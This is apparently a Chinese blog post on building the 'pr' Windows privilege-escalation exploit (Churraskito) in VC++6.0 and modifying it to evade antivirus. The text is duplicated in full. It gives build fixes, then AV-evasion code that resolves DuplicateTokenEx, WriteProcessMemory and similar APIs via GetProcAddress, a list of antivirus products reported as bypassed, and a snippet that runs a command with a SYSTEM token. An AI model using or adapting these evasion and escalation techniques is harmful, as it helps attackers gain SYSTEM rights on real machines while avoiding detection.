网络安全:PR Source code Build & to avoid killing
2013-06-13 14:37
639 查看
这里源码是暗组上面提供的KOOPie写的pr
这些利用工具源码都是vs 2003,编译的环境和vc不太一样,因此,在编译的时候会出现这样那样的问题
下面我们就以vc++6.0来编译pr。
环境:vc++6.0
缺少的文件:sshwbemhelpers.h(2003服务器特有的),所以需要我们到网上下载 覆盖到 X:\program files\microsoft visual studio\vc98\include\sshwbemhelpers.h
e:\teamprogram\visualc++6.0\pr\churraskito\stdafx.h(10) : fatal error C1083: Cannot open include file: 'SshWbemHelpers.h': No such file or directory stdafx.cpp
e:\teamprogram\visualc++6.0\pr\churraskito\stdafx.h(10) : fatal error C1083: Cannot open include file: 'SshWbemHelpers.h': No such file or directory
执行 cl.exe 时出错.
工程设置:
Project Settings -->Links-->对象/库模块后面添加以下几个类库,否则会出现下面几种错误
psapi.lib wsock32.lib Ws2_32.lib,xolehlp.lib
d:\program files\microsoft visual studio\vc98\include\sshwbemhelpers.h(23) : warning C4068: unknown pragma
d:\program files\microsoft visual studio\vc98\include\sshwbemhelpers.h(769) : warning C4068: unknown pragma
stdafx.cpp
Linking...
Churraskito.obj : error LNK2001: unresolved external symbol _GetModuleBaseNameA@16
Churraskito.obj : error LNK2001: unresolved external symbol _EnumProcessModules@16
Churraskito.obj : error LNK2001: unresolved external symbol __imp__connect@12
Churraskito.obj : error LNK2001: unresolved external symbol __imp__inet_addr@4
Churraskito.obj : error LNK2001: unresolved external symbol __imp__htons@4
Churraskito.obj : error LNK2001: unresolved external symbol __imp__bind@12
Churraskito.obj : error LNK2001: unresolved external symbol __imp__WSASocketA@24
Churraskito.obj : error LNK2001: unresolved external symbol __imp__WSAStartup@8
Debug/Churraskito.exe : fatal error LNK1120: 8 unresolved externals
*******************************************免杀**********************************************
nod32:
LookupAccountSid
DuplicateTokenEx
typedef WINADVAPI BOOL (WINAPI *LookupAccountSidAT)
(
__in_opt LPCSTR lpSystemName,
__in PSID Sid,
__out_ecount_part_opt(*cchName, *cchName + 1) LPSTR Name,
__inout LPDWORD cchName,
__out_ecount_part_opt(*cchReferencedDomainName, *cchReferencedDomainName + 1) LPSTR ReferencedDomainName, __inout LPDWORD cchReferencedDomainName,
__out PSID_NAME_USE peUse
);
LookupAccountSidAT pLookupAccountSidA = (LookupAccountSidAT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),"LookupAccountSidA");
typedef WINADVAPI BOOL (WINAPI *DuplicateTokenExT)
(
__in HANDLE hExistingToken,
__in DWORD dwDesiredAccess,
__in_opt LPSECURITY_ATTRIBUTES lpTokenAttributes,
__in SECURITY_IMPERSONATION_LEVEL ImpersonationLevel,
__in TOKEN_TYPE TokenType,
__deref_out PHANDLE phNewToken
);
DuplicateTokenExT pDuplicateTokenEx = (DuplicateTokenExT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),"DuplicateTokenEx");
kaspersky:过
Avira AntiVir :过
mcafee: 过
AVG: 过
symantec企业版:过
Norton AntiVirus:过
360全套:过
金山毒霸全套:
typedef WINBASEAPI BOOL (WINAPI *VirtualProtectExT)
(
__in HANDLE hProcess,
__in LPVOID lpAddress,
__in SIZE_T dwSize,
__in DWORD flNewProtect,
__out PDWORD lpflOldProtect
);
VirtualProtectExT pVirtualProtectEx = (VirtualProtectExT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"VirtualProtectEx");
typedef WINBASEAPI BOOL (WINAPI *WriteProcessMemoryT)
(
__in HANDLE hProcess,
__in LPVOID lpBaseAddress,
__in_bcount(nSize) LPCVOID lpBuffer,
__in SIZE_T nSize,
__out_opt SIZE_T * lpNumberOfBytesWritten
);
WriteProcessMemoryT pWriteProcessMemory = (WriteProcessMemoryT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"WriteProcessMemory");
typedef WINADVAPI BOOL (WINAPI *GetTokenInformationT)
(
__in HANDLE TokenHandle,
__in TOKEN_INFORMATION_CLASS TokenInformationClass,
__out_bcount_part_opt(TokenInformationLength, *ReturnLength) LPVOID TokenInformation,
__in DWORD TokenInformationLength,
__out_opt PDWORD ReturnLength
);
GetTokenInformationT pGetTokenInformation = (GetTokenInformationT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),"GetTokenInformation");
金山主动防御能过,金山杀毒扫描能出来,但是执行不提示,杀下面的两个自定义函数 :
DelRegistrySubkeys和(RunCommandAsSystem
DelRegistrySubkeys();
printf ("/xxoo/-->Running command with SYSTEM Token...\n");
if (RunCommandAsSystem(hTokenOut, lpCommand))
{
printf ("/xxoo/-->Done, command should have ran as SYSTEM!\n");
return 0;
}
这些利用工具源码都是vs 2003,编译的环境和vc不太一样,因此,在编译的时候会出现这样那样的问题
下面我们就以vc++6.0来编译pr。
环境:vc++6.0
缺少的文件:sshwbemhelpers.h(2003服务器特有的),所以需要我们到网上下载 覆盖到 X:\program files\microsoft visual studio\vc98\include\sshwbemhelpers.h
e:\teamprogram\visualc++6.0\pr\churraskito\stdafx.h(10) : fatal error C1083: Cannot open include file: 'SshWbemHelpers.h': No such file or directory stdafx.cpp
e:\teamprogram\visualc++6.0\pr\churraskito\stdafx.h(10) : fatal error C1083: Cannot open include file: 'SshWbemHelpers.h': No such file or directory
执行 cl.exe 时出错.
工程设置:
Project Settings -->Links-->对象/库模块后面添加以下几个类库,否则会出现下面几种错误
psapi.lib wsock32.lib Ws2_32.lib,xolehlp.lib
d:\program files\microsoft visual studio\vc98\include\sshwbemhelpers.h(23) : warning C4068: unknown pragma
d:\program files\microsoft visual studio\vc98\include\sshwbemhelpers.h(769) : warning C4068: unknown pragma
stdafx.cpp
Linking...
Churraskito.obj : error LNK2001: unresolved external symbol _GetModuleBaseNameA@16
Churraskito.obj : error LNK2001: unresolved external symbol _EnumProcessModules@16
Churraskito.obj : error LNK2001: unresolved external symbol __imp__connect@12
Churraskito.obj : error LNK2001: unresolved external symbol __imp__inet_addr@4
Churraskito.obj : error LNK2001: unresolved external symbol __imp__htons@4
Churraskito.obj : error LNK2001: unresolved external symbol __imp__bind@12
Churraskito.obj : error LNK2001: unresolved external symbol __imp__WSASocketA@24
Churraskito.obj : error LNK2001: unresolved external symbol __imp__WSAStartup@8
Debug/Churraskito.exe : fatal error LNK1120: 8 unresolved externals
*******************************************免杀**********************************************
nod32:
LookupAccountSid
DuplicateTokenEx
typedef WINADVAPI BOOL (WINAPI *LookupAccountSidAT)
(
__in_opt LPCSTR lpSystemName,
__in PSID Sid,
__out_ecount_part_opt(*cchName, *cchName + 1) LPSTR Name,
__inout LPDWORD cchName,
__out_ecount_part_opt(*cchReferencedDomainName, *cchReferencedDomainName + 1) LPSTR ReferencedDomainName, __inout LPDWORD cchReferencedDomainName,
__out PSID_NAME_USE peUse
);
LookupAccountSidAT pLookupAccountSidA = (LookupAccountSidAT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),"LookupAccountSidA");
typedef WINADVAPI BOOL (WINAPI *DuplicateTokenExT)
(
__in HANDLE hExistingToken,
__in DWORD dwDesiredAccess,
__in_opt LPSECURITY_ATTRIBUTES lpTokenAttributes,
__in SECURITY_IMPERSONATION_LEVEL ImpersonationLevel,
__in TOKEN_TYPE TokenType,
__deref_out PHANDLE phNewToken
);
DuplicateTokenExT pDuplicateTokenEx = (DuplicateTokenExT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),"DuplicateTokenEx");
kaspersky:过
Avira AntiVir :过
mcafee: 过
AVG: 过
symantec企业版:过
Norton AntiVirus:过
360全套:过
金山毒霸全套:
typedef WINBASEAPI BOOL (WINAPI *VirtualProtectExT)
(
__in HANDLE hProcess,
__in LPVOID lpAddress,
__in SIZE_T dwSize,
__in DWORD flNewProtect,
__out PDWORD lpflOldProtect
);
VirtualProtectExT pVirtualProtectEx = (VirtualProtectExT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"VirtualProtectEx");
typedef WINBASEAPI BOOL (WINAPI *WriteProcessMemoryT)
(
__in HANDLE hProcess,
__in LPVOID lpBaseAddress,
__in_bcount(nSize) LPCVOID lpBuffer,
__in SIZE_T nSize,
__out_opt SIZE_T * lpNumberOfBytesWritten
);
WriteProcessMemoryT pWriteProcessMemory = (WriteProcessMemoryT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"WriteProcessMemory");
typedef WINADVAPI BOOL (WINAPI *GetTokenInformationT)
(
__in HANDLE TokenHandle,
__in TOKEN_INFORMATION_CLASS TokenInformationClass,
__out_bcount_part_opt(TokenInformationLength, *ReturnLength) LPVOID TokenInformation,
__in DWORD TokenInformationLength,
__out_opt PDWORD ReturnLength
);
GetTokenInformationT pGetTokenInformation = (GetTokenInformationT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),"GetTokenInformation");
金山主动防御能过,金山杀毒扫描能出来,但是执行不提示,杀下面的两个自定义函数 :
DelRegistrySubkeys和(RunCommandAsSystem
DelRegistrySubkeys();
printf ("/xxoo/-->Running command with SYSTEM Token...\n");
if (RunCommandAsSystem(hTokenOut, lpCommand))
{
printf ("/xxoo/-->Done, command should have ran as SYSTEM!\n");
return 0;
}
相关文章推荐
- How to build the Robotics Library from source code on Windows
- how to build and install vim from source code
- How to build windows azure PowerShell Source Code
- no rule to process file 'xxx/.../jquery.js' of type sourcecode.javascript for architecture i386
- warning: no rule to process file 'h' of type sourcecode.c.h for architecture i386
- Atlas Control Toolkit and Source Code for the Build-in Asp.Net 2.0 Providers
- How to build NCL and NCAR Graphics from source code
- How to build and debug android source code
- How to build NCL and NCAR Graphics from source code
- How to use "vi" edit the docs or source code files
- DIY BROADCAST : How to build your own Internet TV Channel with Open-Source & other goodies
- Atlas Control Toolkit and Source Code for the Build-in Asp.Net 2.0 Providers
- Solution to "The breakpoint will not currently be hit. The source code is different from the original version."
- 软件安全测试之网络安全&管理安全
- Build RPM package from source code
- Plug-in "net.sourceforge.jode" was unable to instantiate class "net.sourceforge.jode.JodeClassFileEd
- ERROR: JDWP Unable to get JNI 1.2 environment, jvm->GetEnv() return code = -2
- Setting property 'source' to 'org.eclipse.jst.jee.server:jeecg' did not find a matching property
- 网络安全基础篇之<十三>
- 项目管理实践【五】自动编译和发布网站【Using Visual Studio with Source Control System to build and publish website automatically】